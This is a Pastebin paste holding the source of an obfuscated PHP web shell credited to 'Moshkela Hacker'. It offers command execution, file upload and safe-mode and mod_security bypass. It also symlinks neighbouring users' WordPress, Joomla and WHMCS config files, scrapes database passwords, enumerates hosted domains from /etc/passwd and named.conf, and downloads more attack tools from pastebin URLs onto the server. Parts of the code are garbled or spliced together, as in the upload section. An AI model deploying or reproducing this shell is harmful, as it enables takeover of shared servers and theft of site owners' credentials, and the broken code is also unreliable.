Advertisement
Guest User

Untitled

a guest
Sep 15th, 2019
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.41 KB | None | 0 0
  1.  
  2. onscity/flags/128/iraq-icon.png">
  3. </head>
  4. <?php set_time_limit(0); error_reporting(0); ?>
  5. <?php ?><html>
  6.  
  7.  
  8. <style type="text/css">
  9. html,body{
  10. background: #f9f9f9;
  11. padding: 0;
  12. direction: ltr;
  13. margin: 0;
  14. }
  15. h1{
  16. color:#ff0000;
  17. text-shadow:0 0 5px;
  18. }
  19. h3{
  20. color:#ff0000;
  21. text-shadow:0 0 1px;
  22. }
  23. .f{
  24. color:#666;
  25. text-shadow: 0 0 5px #00ff00;
  26. font-size: 20px;
  27. }
  28. a{
  29. text-decoration: none;
  30. color:#ff0000;
  31. text-shadow:0 0 5px;
  32. }
  33. input[type=submit]{
  34. padding: 9px;
  35. border:1px solid #ccc;
  36. background: #f9f9f9;
  37. border-radius: 2px;
  38. cursor: pointer;
  39. color:#000;
  40. transition: all 0.2s;
  41. }
  42. input[type=submit]:hover{
  43. box-shadow: 0 0 2px #ff0000;
  44. }
  45. input[type=text]{
  46. color:#000;
  47. border:1px solid #ccc;
  48. background: #f9f9f9;
  49. padding: 10px;
  50. width: 400px;
  51. transition: all 0.5s;
  52. }
  53. input[type=text]:focus{
  54. box-shadow: 0 0 3px #ff0000;
  55. }
  56. hr{
  57. border: 0;
  58. height: 2px;
  59. background: #333;
  60. background-image: linear-gradient(to right, #FF00FF, #333, #FF00FF);
  61. }}
  62. </style>
  63. <center>
  64. <hr>
  65. <form method='GET'>
  66.  
  67. <input type='submit'name='tool' value='Safe Mode' size='10' >
  68. <input type='submit'name='tool' value='Execute' size='10' >
  69. <input type='submit'name='tool' value='Config Killer' size='10' >
  70. <input type='submit'name='tool' value='Symlink' size='10' >
  71. <input type='submit'name='tool' value='Symlink 2' size='10' >
  72. <input type='submit'name='tool' value='Jumping' size='10' >
  73. <input type='submit'name='tool' value='Pass Config' size='10' >
  74. <input type='submit'name='tool' value='Upload' size='10' >
  75. <input type='submit'name='tool' value='Other tools' size='10' >
  76. <input type='submit'name='tool' value='Server Info' size='10' >
  77. <input type='submit'name='tool' value='About' size='10' >
  78.  
  79.  
  80.  
  81. </h5>
  82.  
  83. </form>
  84. <hr>
  85. <?php $x73 = "basename"; $x74 = "chdir"; $x75 = "copy"; $x76 = "error_reporting"; $x77 = "eregi"; $x78 = "ereg"; $x79 = "explode"; $x7a = "fclose"; $x7b = "file_get_contents"; $x7c = "file_put_contents"; $x7d = "file"; $x7e = "flush"; $x7f = "fileowner"; $x80 = "fopen"; $x81 = "fwrite"; $x82 = "function_exists"; $x83 = "getcwd"; $x84 = "ini_restore"; $x85 = "ini_get"; $x86 = "is_file"; $x87 = "mail"; $x88 = "mkdir"; $x89 = "mysql_connect"; $x8a = "mysql_fetch_array"; $x8b = "mysql_query"; $x8c = "mysql_select_db"; $x8d = "phpversion"; $x8e = "posix_getpwuid"; $x8f = "preg_match_all"; $x90 = "preg_match"; $x91 = "rand"; $x92 = "set_time_limit"; $x93 = "shell_exec"; $x94 = "strlen"; $x95 = "symlink"; $x96 = "system"; $x97 = "trim"; $x92(0); $x76(0); if ($_REQUEST['tool'] == "Safe Mode") { echo '<h3> Safe Mode Fucker </h3>
  86. <br><form method="POST" action="">
  87. <select name="way">
  88. <option>php.ini</option>
  89. <option>ini.php</option>
  90. <option>htaccess</option>
  91. </select><input name="bypass" type="submit"class="dh" value="Bypass Using"><br>'; if ($_POST['way'] == "htaccess") { x0b(); } elseif ($_POST['way'] == "php.ini") { x0c(); } elseif ($_POST['way'] == "ini.php") { x0d(); } } function x0b() { global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97; $x2f = $x80($x83() . $x30 . "/.htaccess", "w"); $x81($x2f, "Options +FollowSymLinks
  92. DirectoryIndex india.htm
  93.  
  94. Options All Indexes
  95. <IfModule mod_security.c>
  96. SecFilterEngine Off
  97. SecFilterScanPOST Off
  98.  
  99. SecFilterCheckURLEncoding Off
  100. SecFilterCheckCookieFormat Off
  101. SecFilterCheckUnicodeEncoding Off
  102. SecFilterNormalizeCookies Off
  103. </IfModule>
  104. SetEnv PHPRC " . $x83() . $x30 . "/php.ini
  105. suPHP_ConfigPath " . $x83() . $x30 . "/php.ini"); $x7a($x2f); if ($x86($x83() . $x30 . "/.htaccess")) { echo "<Span style='color:#FF00FF;'><strong>.htaccess Created successfully</strong></span><br>"; } else { echo "<strong><Span style='color:#FF00FF;'>I can not create .htaccess</strong></span><br>"; }; } function x0c() { global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97; $x31 = $x80($x83() . $x30 . "/php.ini", "w"); $x81($x31, "safe_mode = Off
  106. disable_functions = NONE
  107. safe_mode_gid = OFF
  108.  
  109. open_basedir = OFF"); $x7a($x31); if ($x86($x83() . $x30 . "/php.ini")) { echo "<strong><Span style='color:#FF00FF;'>php.ini Created successfully</strong></span><br>"; } else { echo "<strong><Span style='color:#FF00FF;'>I can not create php.ini</strong></span><br>"; }; } function x0d() { global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97; $x32 = $x80($x83() . $x30 . "/ini.php", "w"); $x81($x32, '$x84("safe_mode");
  110. $x84("open_basedir");'); $x7a($x32); if ($x86($x83() . $x30 . "/ini.php")) { echo "<strong><Span style='color:#FF00FF;'>ini.php Created successfully</strong></span><br>"; } else { echo "<strong><Span style='color:red;'>I can not create ini.php</strong></span><br>"; }; } if ($_REQUEST['tool'] == "Execute") { echo '<h3> Execute </h3>
  111. <form method="post">
  112. <input name="cmd" />
  113. <input type="submit"class="dh" name="go" />
  114. </form>'; if ($_POST['go']) { $x4b = $x82("system"); $x4c = $x82("passthru"); $x4d = $x82("shell_exec"); if ($x4b) { echo "<textarea readonly='' cols='90'rows='20'>"; echo $x96($_POST['cmd']); echo '</textarea>'; } if (!$x4b & $x4c) { echo "<textarea readonly='' cols='90'rows='20'>"; echo passthrsu($_POST['cmd']); echo '</textarea>'; } if (!$x4b & !$x4c & $x4d) { echo "<textarea readonly='' cols='90'rows='20'>"; echo $x93($_POST['cmd']); echo '</textarea>'; } } } else if ($_REQUEST['tool'] == "Upload") { echo"<h3>Upload</h3>"; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if (isset($_FILES['image']['name'])) { $abod = $filedir.$userfile_nEXEC ExecCGI
  115.  
  116. Options Indexes FollowSymLinks
  117. ForceType text/plain
  118. AddType text/plain .php
  119.  
  120. AddType text/plain .html
  121.  
  122. AddType text/html .shtml
  123. AddType txt .php
  124. AddHandler server-parsed .php
  125.  
  126. AddHandler txt .php
  127.  
  128. AddHandler txt .html
  129.  
  130. AddHandler txt .shtml
  131.  
  132. Options All
  133. Options All"; $x7c(".htaccess", $x2f, FILE_APPEND); $x35 = $_POST["passwd"]; $x35 = $x79("
  134. ", $x35); foreach ($x35 as $x36) { $x37 = $x79(":", $x36); $x38 = $x37[0]; @$x95('/home/' . $x38 . '/public_html/wp-config.php', $x38 . '-wp13.txt'); @$x95('/home/' . $x38 . '/public_html/wp/wp-config.php', $x38 . '-wp13-wp.txt'); @$x95('/home/' . $x38 . '/public_html/WP/wp-config.php', $x38 . '-wp13-WP.txt'); @$x95('/home/' . $x38 . '/public_html/wp/beta/wp-config.php', $x38 . '-wp13-wp-beta.txt'); @$x95('/home/' . $x38 . '/public_html/beta/wp-config.php', $x38 . '-wp13-beta.txt'); @$x95('/home/' . $x38 . '/public_html/press/wp-config.php', $x38 . '-wp13-press.txt'); @$x95('/home/' . $x38 . '/public_html/wordpress/wp-config.php', $x38 . '-wp13-wordpress.txt'); @$x95('/home/' . $x38 . '/public_html/Wordpress/wp-config.php', $x38 . '-wp13-Wordpress.txt'); @$x95('/home/' . $x38 . '/public_html/blog/wp-config.php', $x38 . '-wp13-Wordpress.txt'); @$x95('/home/' . $x38 . '/public_html/config.php', $x38 . '-configgg.txt'); @$x95('/home/' . $x38 . '/public_html/news/wp-config.php', $x38 . '-wp13-news.txt'); @$x95('/home/' . $x38 . '/public_html/new/wp-config.php', $x38 . '-wp13-new.txt'); @$x95('/home/' . $x38 . '/public_html/blog/wp-config.php', $x38 . '-wp-blog.txt'); @$x95('/home/' . $x38 . '/public_html/beta/wp-config.php', $x38 . '-wp-beta.txt'); @$x95('/home/' . $x38 . '/public_html/blogs/wp-config.php', $x38 . '-wp-blogs.txt'); @$x95('/home/' . $x38 . '/public_html/home/wp-config.php', $x38 . '-wp-home.txt'); @$x95('/home/' . $x38 . '/public_html/db.php', $x38 . '-dbconf.txt'); @$x95('/home/' . $x38 . '/public_html/site/wp-config.php', $x38 . '-wp-site.txt'); @$x95('/home/' . $x38 . '/public_html/main/wp-config.php', $x38 . '-wp-main.txt'); @$x95('/home/' . $x38 . '/public_html/configuration.php', $x38 . '-wp-test.txt'); @$x95('/home/' . $x38 . '/public_html/joomla/configuration.php', $x38 . '-joomla2.txt'); @$x95('/home/' . $x38 . '/public_html/portal/configuration.php', $x38 . '-joomla-protal.txt'); @$x95('/home/' . $x38 . '/public_html/joo/configuration.php', $x38 . '-joo.txt'); @$x95('/home/' . $x38 . '/public_html/cms/configuration.php', $x38 . '-joomla-cms.txt'); @$x95('/home/' . $x38 . '/public_html/site/configuration.php', $x38 . '-joomla-site.txt'); @$x95('/home/' . $x38 . '/public_html/main/configuration.php', $x38 . '-joomla-main.txt'); @$x95('/home/' . $x38 . '/public_html/news/configuration.php', $x38 . '-joomla-news.txt'); @$x95('/home/' . $x38 . '/public_html/new/configuration.php', $x38 . '-joomla-new.txt'); @$x95('/home/' . $x38 . '/public_html/home/configuration.php', $x38 . '-joomla-home.txt'); @$x95('/home/' . $x38 . '/public_html/vb/includes/config.php', $x38 . '-vb-config.txt'); @$x95('/home/' . $x38 . '/public_html/whm/configuration.php', $x38 . '-whm15.txt'); @$x95('/home/' . $x38 . '/public_html/central/configuration.php', $x38 . '-whm-central.txt'); @$x95('/home/' . $x38 . '/public_html/whm/whmcs/configuration.php', $x38 . '-whm-whmcs.txt'); @$x95('/home/' . $x38 . '/public_html/whm/WHMCS/configuration.php', $x38 . '-whm-WHMCS.txt'); @$x95('/home/' . $x38 . '/public_html/whmc/WHM/configuration.php', $x38 . '-whmc-WHM.txt'); @$x95('/home/' . $x38 . '/public_html/whmcs/configuration.php', $x38 . '-whmcs.txt'); @$x95('/home/' . $x38 . '/public_html/support/configuration.php', $x38 . '-support.txt'); @$x95('/home/' . $x38 . '/public_html/configuration.php', $x38 . '-joomla.txt'); @$x95('/home/' . $x38 . '/public_html/submitticket.php', $x38 . '-whmcs2.txt'); @$x95('/home/' . $x38 . '/public_html/whm/configuration.php', $x38 . '-whm.txt'); } echo '<b class="cone"><font face="Tahoma" color="#FF00FF" size="2pt"><b>[M-IRAQ] -></b> <a target="_blank" href="M-Iraq">Open configs</a></font></b>'; } } else if ($_REQUEST['tool'] == "Symlink") { echo "<h3>Symlink Bypass </h3>"; echo '<form action="" method="post">'; @$x92(0); echo "<center>"; @$x88('m-iraq', 0777); $x2f = "Options Indexes FollowSymLinks
  135. DirectoryIndex ssssss.htm
  136. AddType txt .php
  137. AddHandler txt .php
  138. AddType txt .html
  139. AddHandler txt .html
  140. Options all
  141. Options
  142. Options
  143. ReadmeName r.txt"; $x26 = @$x80('m-iraq/.htaccess', 'w'); $x81($x26, $x2f); @$x95('/', 'm-iraq/root'); $x27 = $x73('index.php'); $x28 = @$x7d('/etc/named.conf'); if (!$x28) { echo "<pre ='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>"; } else { echo "<br><br><div><table border='1' bordercolor='#FF00FF' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>"; foreach ($x28 as $x29) { if ($x77('zone', $x29)) { $x8f('#zone "(.*)"#', $x29, $x2a); $x7e(); if ($x94($x97($x2a[1][0])) > 2) { $x2b = $x8e(@$x7f('/etc/valiases/' . $x2a[1][0])); $x2c = $x2b['name']; @$x95('/', 'm-iraq/root'); $x2c = $x2a[1][0]; $x2d = '\.sa'; $x2e = '\.il'; $x1e = '\.id'; $x1f = '\.sg'; $x20 = '\.edu'; $x21 = '\.gov'; $x22 = '\.go'; $x23 = '\.gob'; $x24 = '\.mil'; $x25 = '\.mi'; if ($x77("$x2d", $x2a[1][0]) or $x77("$x2e", $x2a[1][0]) or $x77("$x1e", $x2a[1][0]) or $x77("$x1f", $x2a[1][0]) or $x77("$x20", $x2a[1][0]) or $x77("$x21", $x2a[1][0]) or $x77("$x22", $x2a[1][0]) or $x77("$x23", $x2a[1][0]) or $x77("$x24", $x2a[1][0]) or $x77("$x25", $x2a[1][0])) { $x2c = "<div style=' color: #FF00FF ; text-shadow: 0px 0px 1px red; '>" . $x2a[1][0] . '</div>'; } echo "
  144. <tr>
  145. <td>
  146. <div class='dom'><a target='_blank' href=http://www." . $x2a[1][0] . '/>' . $x2c . ' </a> </div>
  147. </td>
  148. <td>
  149. ' . $x2b['name'] . "
  150. </td>
  151.  
  152. <td>
  153. <a href='m-iraq/root/home/" . $x2b['name'] . "/public_html' target='_blank'>Symlink </a>
  154. </td>
  155. </tr></div> "; } } } } echo "</table>"; } else if ($_REQUEST['tool'] == "Symlink 2") { echo '
  156. <h3>Symlink-2</h3>
  157. <FORM ACTION="#" METHOD="POST">
  158. <br>
  159. <br>
  160. <center> <font size="2" face="MV Boli" color=rgba(1, 44, 221, 0.9) ></font> <INPUT TYPE="text" NAME="user"placeholder="/home/user/public_html/config.php" SIZE=60><INPUT TYPE="submit"class="dh" VALUE="Sym"> </center>
  161. </FORM>'; $x4e = $_POST["user"]; $x4f = '' . $x91() . '.txt'; if ($x4e) { $x50 = $x91(); @$x88($x50); $x51 = $x50 . "/.htaccess"; $x52 = $x80($x51, 'w') or die("Error: Can't open file"); $x53 = 'Options +Indexes
  162. ReadMeName ' . $x4f; $x81($x52, $x53); $x7a($x52); $x74($x50); $x95($x4e, $x4f); $x74("../"); echo "<center><iframe height ='500px' width='100%' src=" . $x50 . "></iframe></center>"; } } else if ($_REQUEST['tool'] == "Pass Config") { echo"<h3>Get Password in Config</h3>"; echo '<form method="post">
  163. <input type="text" name="conf" value="" />
  164. <input type="submit"class="dh"value="GeT Passwords" name="get" />
  165. </form>'; $x39 = $_POST['get']; $x3a = $_POST['conf']; if (isset($x39) && $x3a != "") { $x3b = @$x7b($x3a); $x8f('#href="(.*?)"#', $x3b, $x3c); foreach ($x3c[1] as $x3d) { $x3e = $x3a . $x3d; $x3f = @$x7b($x3e); $x90('#\'DB_PASSWORD\', \'(.*)\'#', $x3f, $x40); $x90('#password = \'(.*)\'#', $x3f, $x41); $x90('#password\'] = \'(.*)\'#', $x3f, $x42); $x90('#db_password = "(.*)"#', $x3f, $x43); $x90('#db_password = \'(.*)\'#', $x3f, $x43); $x90('#dbpass = "(.*)"#', $x3f, $x44); $x90('#password = \'(.*)\'#', $x3f, $x45); $x90('#dbpasswd = \'(.*)\'#', $x3f, $x46); $x90('#password_localhost = "(.*)"#', $x3f, $x47); $x90('#senha = "(.*)"#', $x3f, $x48); if (!empty($x40[1])) { echo $x40[1] . "<br>"; } elseif (!empty($x41[1])) { echo $x41[1] . "<br>"; } elseif (!empty($x42[1])) { echo $x42[1] . "<br>"; } elseif (!empty($x43[1])) { echo $x43[1] . "<br>"; } elseif (!empty($x44[1])) { echo $x44[1] . "<br>"; } elseif (!empty($x45[1])) { echo $x45[1] . "<br>"; } elseif (!empty($x49[1])) { echo $x49[1] . "<br>"; } elseif (!empty($x46[1])) { echo $x46[1] . "<br>"; } elseif (!empty($x47[1])) { echo $x47[1] . "<br>"; } elseif (!empty($x48[1])) { echo $x48[1] . "<br>"; } } } } else if ($_REQUEST['tool'] == "Jumping") { echo"<h3>Jumping</h3>"; $x26 = "array_push"; $x27 = "feof"; $x28 = "fgets"; $x29 = "fopen"; $x2a = "ini_get"; $x2b = "is_readable"; $x2c = "set_time_limit"; $x2d = "strpos"; $x2e = "substr"; ($x2f = $x2a('safe_mode') == 0) ? $x2f = 'off' : die('<b>Error: Safe Mode is On</b>'); $x2c(0); @$x30 = $x29('/etc/passwd', 'r'); if (!$x30) { die('<b><font face=Verdana size=2 color=#FF00FF> Error : Can Not Read Config Of Server </b>'); } $x31 = array(); $x32 = array(); $x33 = array(); $x34 = 0; echo "<b><font face=Verdana size=13 color=#FF00FF> </font></b><br />"; echo "<br />"; while (!$x27($x30)) { $x35 = $x28($x30); if ($x34 > 35) { $x36 = $x2d($x35, ':'); $x37 = $x2e($x35, 0, $x36); $x38 = '/home/' . $x37 . '/public_html/'; if (($x37 != '')) { if ($x2b($x38)) { $x26($x32, $x37); $x26($x31, $x38); echo "<font face=Verdana size=2 color=#FF00FF> $x38</font>"; echo "<br/>"; } } } $x34++; } } else if ($_REQUEST['tool'] == "About") { echo '
  166. <img src="http://d.top4top.net/p_37rzbl1.png" width="500" height="400" />
  167. <h1> Coded By Moshkela Hacker<br>
  168.  
  169. </h1>
  170. <h3>tnx : Mostafa Moshkela </h3>
  171.  
  172. '; } else if ($_REQUEST['tool'] == "Server Info") { echo"<h3>Server Info</h3>"; $safe = ini_get("safe_mode"); if($safe == 1){ $safe_mode = "<font color=red>ON</font>"; }else{ $safe_mode = "<font color=#FF00FF>OFF</font>"; } $dis = ini_get("disable_functions"); if($dis == ""){ $disable = "<font color=#FF00FF>None</font>"; }else{ $disable = "<font color=red>$dis</font>"; } $uname = php_uname(); $server = $_SERVER['SERVER_ADDR']; $me = $_SERVER['REMOTE_ADDR']; echo "
  173. <div>
  174. <span>
  175. Uname-a : $uname<br>
  176. Safe Mode : $safe_mode<br>
  177. Disable Functions : $disable
  178. </span>
  179. <span class=info2>
  180. <br>Server IP : $server </br>
  181. <br>Your IP : $me </br>
  182. </span>
  183. </div>
  184. "; }else if($_REQUEST['tool'] == "Other tools"){ echo"<h3>Other tools</h3>"; echo'<form method="post">
  185. <b><span style=\"color: rgb(51, 204, 0);\"> Tools : <b></span><select name="tools" >
  186. <option>Moshkela Hacker Tools</option>
  187. <option>Find Shell</option>
  188. <option>Get Jomla Sites</option>
  189. <option>Get WordPress Sites</option>
  190. <option>Get All Sites Server</option>
  191. <option>1337w0rm</option>
  192. <option>Adminer</option>
  193. <option>Mass Password</option>
  194. </select>
  195. <input type="submit" name="get" value="Get" />
  196. </form>'; if($_POST['get']){ switch($_POST['tools']){ case "Find Shell": if(file_put_contents('Findshell.php',file_get_contents('http://pastebin.com/raw/AR8MzfZV'))){ echo "<center><font color=red size=8>Findshell.php Done !</font></center>"; }; break; case "Get Jomla Sites": if(file_put_contents('jomla.php',file_get_contents('http://pastebin.com/raw/9BQ62rZF'))){ echo "<center><font color=red size=8>jomla.php Done !</font></center>"; } break; case "Get WordPress Sites": if(file_put_contents('wordpress.php',file_get_contents('http://pastebin.com/raw/504iswx3'))){ echo "<center><font color=red size=8>wordpress.php Done !</font></center>"; } break; case "Get All Sites Server": if(file_put_contents('ip.php',file_get_contents('http://pastebin.com/raw/c70btt4r'))){ echo "<center><font color=red size=8>ip.php Done !</font></center>"; } break; case "1337w0rm": if(file_put_contents('1337w0rm.php',file_get_contents('http://pastebin.com/raw/sqK6hVJd'))){ echo "<center><font color=red size=8>1337w0rm.php Done !</font></center>"; } break; case "Adminer": if(file_put_contents('Adminer.php',file_get_contents('http://pastebin.com/raw/BZHXtZqu'))){ echo "<center><font color=red size=8>Adminer.php Done !</font></center>"; } break; case "Mass Password": if(file_put_contents('Masspass.php',file_get_contents('http://pastebin.com/raw/eLv6MUpD'))){ echo "<center><font color=red size=8>Masspass.php Done !</font></center>"; } break; } }}
  197. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement